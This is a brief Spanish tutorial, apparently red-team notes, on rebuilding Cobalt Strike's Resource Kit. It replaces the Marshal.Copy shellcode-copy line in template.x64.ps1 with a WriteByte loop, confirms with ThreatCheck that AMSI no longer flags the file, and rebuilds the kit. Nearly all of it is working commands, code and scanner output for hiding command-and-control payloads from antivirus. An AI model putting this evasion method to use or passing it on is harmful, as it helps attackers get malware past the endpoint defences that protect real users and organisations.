Resource Kit
El Resource Kit es el medio de Cobalt Strike para cambiar las plantillas de scripts HTA, PowerShell, Python, VBA y VBS que Cobalt Strike utiliza en sus flujos de trabajo. El Resource Kit es parte del Arsenal Kit, que contiene una colección de kits.
Para compilar el resource kit utilizamos el siguiente comando.
./build.sh /opt/CS491/resourcesUna vez compilado nos genera diferentes archivos el que modificaremos sera template.x64.ps1 que utiliza cobalt strike para generar los scripts. Sin embargo estos seran detectables por el AV. La forma mas facil de que no sea detectado es modificar la linea.
[System.Runtime.InteropServices.Marshal]::Copy($v_code, 0, $var_buffer, $v_code.length)Por lo siguiente.
for ($i = 0; $i -lt $v_code.Length; $i++) {
[System.Runtime.InteropServices.Marshal]::WriteByte($var_buffer, $i, $v_code[$i])
}Utilizamos ThreatCheck para analizar el archivo.
C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\template.x64.ps1 -e amsi[+] No threat found!
[*] Run time: 0.72sEn caso de que la herramienta detecte cadenas maliciosas se require ir modificando el archivo template.x64.ps1 hasta que no sea detectado. Esta solucion puedo ir cambiando con el paso del tiempo.
Compilamos nuevamente el kit.
./build.sh /opt/CS491/resources